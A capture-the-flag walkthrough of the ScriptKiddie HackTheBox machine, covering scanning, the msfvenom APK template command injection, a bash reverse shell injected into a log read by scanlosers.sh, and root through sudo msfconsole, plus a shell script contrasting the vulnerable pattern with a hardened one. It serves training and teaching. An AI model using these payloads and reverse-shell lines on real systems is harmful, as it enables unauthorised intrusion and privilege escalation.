ScriptKiddie HackTheBox WalkThrough
This is a walkthrough of the ScriptKiddie HackTheBox machine. In this writeup I demonstrate step by step how I rooted ScriptKiddie. Before starting, a few facts about the machine: it is a Linux box with IP address 10.10.10.226, and its maker rated the difficulty as easy.
First of all, connect your PC to the HackTheBox VPN and confirm connectivity to the ScriptKiddie machine by pinging its IP, 10.10.10.226. If that works, start hacking. As usual, I started by scanning the machine. Scanning gives an idea of how to proceed: it grabs the banners of the services running on the open ports, and sometimes it reveals vulnerabilities without much further effort. I used nmap for this task; the command and its result are given below:-
Scanning
$ sudo nmap -sC -p- -T3 -sV -oA nmap/full_scan 10.10.10.226
$ cat nmap/full_scan.nmap
The full port scan found ports 22 and 5000 open: OpenSSH 8.2p1 on port 22 and a Werkzeug web server on port 5000. Enumerating port 22 is of little use until we have some valid usernames, and OpenSSH 8.2p1 is not affected by any well-known vulnerability that would help us further, so I left it and moved on to port 5000. Since an HTTP server is running on that port, a website should be reachable at http://10.10.10.226:5000. Before browsing it, I checked Werkzeug 0.16.1 in searchsploit for known vulnerabilities; none was found for this version.
Enumerating on Port 5000
Going to http://10.10.10.226:5000 I found a dynamic website that exposes three tools installed on the box: nmap, msfvenom and searchsploit. Anyone can use it to scan a site, generate an msfvenom payload, or search for available exploits with searchsploit.
I tested the payload functionality first and found that the site can generate payloads for Linux, Windows and Android. It also lets us upload a template file for the payload in a given format. As soon as I saw the upload feature I tried uploading a PHP file and other formats that a web server would normally execute, but without success: the form only accepts .exe, .elf and .apk files, matching the three target formats.
After some googling and a bit of research I found an exploit for Metasploit Framework 6.0.11. According to it, Metasploit Framework's msfvenom payload generator is affected by an APK template command injection vulnerability when a crafted APK file is used as an Android payload template. The affected versions are 6.0.11 and below in the Community edition and 4.18.0 and below in the Pro edition. Rapid7 has published a Metasploit module for it in the framework's repository.
We do not yet know which version of Metasploit is installed on this machine, but it is worth a try. When I created a malicious apk with that module and uploaded it as the template, the injection fired and I got a shell, which confirms that the installed version is 6.0.11 or older. To exploit this vulnerability and get a shell, follow these steps.
1. Create the msf.apk payload using the module unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection. If your Metasploit does not have this module, update it to the latest version, or download the module from the Rapid7 repo, place it under your ~/.msf4/modules/ tree at the same relative path (exploits/unix/fileformat/), and run reload_all inside msfconsole so it is picked up.
Creating APK Payload
msf6 > search metasploit_msfvenom_apk_template
msf6 > use 0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.13
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
$ sudo mv /root/.msf4/local/msf.apk .
2. Once msf.apk is created, start a netcat listener in your terminal. Then, in the browser, generate a payload with os set to android, lhost set to your tun0 IP, and msf.apk selected as the template file.
3. Finally, click the generate button. The server runs msfvenom with the crafted template and the injected command executes. If all goes well you will get a shell on your netcat listener.
Getting User Shell
$ nc -nvlp 4444
$ whoami && id
We have a shell as user kid. Let us upgrade it to a fully interactive TTY so that we can use job control, tab completion and commands that need a terminal (su, sudo password prompts, editors).
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z
# CTRL + Z to background the shell
$ stty raw -echo
$ fg
# To foreground the shell
We have successfully upgraded our shell. Let us grab the user flag from user.txt.
Capture User Flag
$ cat /home/kid/user.txt
Privilege Escalation
Some initial enumeration found another user, pwn, in /home, with a script scanlosers.sh. This script reads input from the hackers file in /home/kid/logs/, does some sanitization on it and then runs an nmap scan against the extracted entries. If you read the code carefully you will find a command injection vulnerability: the text taken from the hackers file ends up inside a shell command string, so a semicolon (;) terminates the nmap command and whatever follows it is executed as well. Because scanlosers.sh is pwn's script and is executed as user pwn, exploiting the injection gives us a shell as pwn rather than as kid.
$ cat /home/pwn/scanlosers.sh
To exploit this vulnerability and get a shell as user pwn, first start a listener on your attacking machine, then append the payload line to the hackers file from the kid shell.
$ nc -nvlp 4321
# in the kid shell on the target
$ cd /home/kid/logs/
$ ls -la
$ echo "a b ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4321 0>&1' #" >> hackers
# back on the listener once the callback arrives
$ whoami && id
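As an added illustration (written for this writeup, not the box's actual scanlosers.sh), the snippet below re-creates the vulnerable pattern and sets a hardened version beside it. The assumptions are mine: the log is split on spaces and the third field onward is treated as the target, the target is spliced unquoted into a string handed to sh -c, and nmap is replaced by echo so the script runs anywhere. The HACKERS_SAMPLE log is constructed, and vuln_scan, safe_scan and is_ipv4 are names I chose.

```shell
#!/bin/sh
# Added example: re-creation of the scanlosers.sh command-injection pattern.
# Constructed sample of a "hackers" log: two legitimate lines and one line
# appended by an attacker. The first two fields of every line are discarded.
HACKERS_SAMPLE='2021-02-01 10:00:01 10.10.14.13
2021-02-01 10:00:02 10.10.14.14
a b ;echo INJECTED #'

# Vulnerable pattern (assumed shape of the original): everything after the
# second field is taken as the target and interpolated, unquoted, into a
# command string for sh -c. A ';' in the log ends the "scan" command and
# runs whatever follows it as the user executing this script.
vuln_scan() {
    printf '%s\n' "$1" | cut -d' ' -f3- | sort -u | while read -r ip; do
        # stand-in for: sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip}"
        sh -c "echo scan ${ip}"
    done
}

# Hardened pattern: allow-list the field as a dotted quad before use.
is_ipv4() {
    case "$1" in
        *[!0-9.]*|""|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s\n' "$1" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# The validated value is passed as a separate argument, never re-parsed by a
# shell, so even a value that slipped past validation could not inject.
safe_scan() {
    printf '%s\n' "$1" | cut -d' ' -f3- | sort -u | while read -r ip; do
        if ! is_ipv4 "$ip"; then
            printf 'rejected: %s\n' "$ip" >&2
            continue
        fi
        # stand-in for: nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip"
        echo scan "$ip"
    done
}

# Run both variants against the constructed log when executed directly.
vuln_scan "$HACKERS_SAMPLE"
safe_scan "$HACKERS_SAMPLE"
```

Running it prints "INJECTED" from the vulnerable loop, while the hardened loop rejects the attacker's line on stderr and scans only the two real addresses. The fix is not quoting alone: the value is checked against an allow-list and then handed to the tool as an argument, so the shell never interprets attacker-controlled text.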
We are user pwn now. Let us find a PrivEsc vector through which we can escalate our privileges.
Finding PrivEsc Vector
$ sudo -l
The sudo -l output shows that user pwn can run /opt/metasploit-framework-6.0.9/msfconsole as root. (Note the version in the path, 6.0.9, consistent with the msfvenom template injection that worked earlier.) msfconsole passes any command it does not recognise to the system shell, so when I ran it as root I could spawn a root shell straight from its prompt. Our privilege escalation vector is therefore abuse of a sudo right (Privilege Escalation using Sudo Right Exploitation).
Let us get root shell.
Getting Root Shell
$ sudo /opt/metasploit-framework-6.0.9/msfconsole
msf6 > /bin/bash -i
# whoami && id
We are root now. Let us capture root flag from root.txt file.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the ScriptKiddie HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. For any query or suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.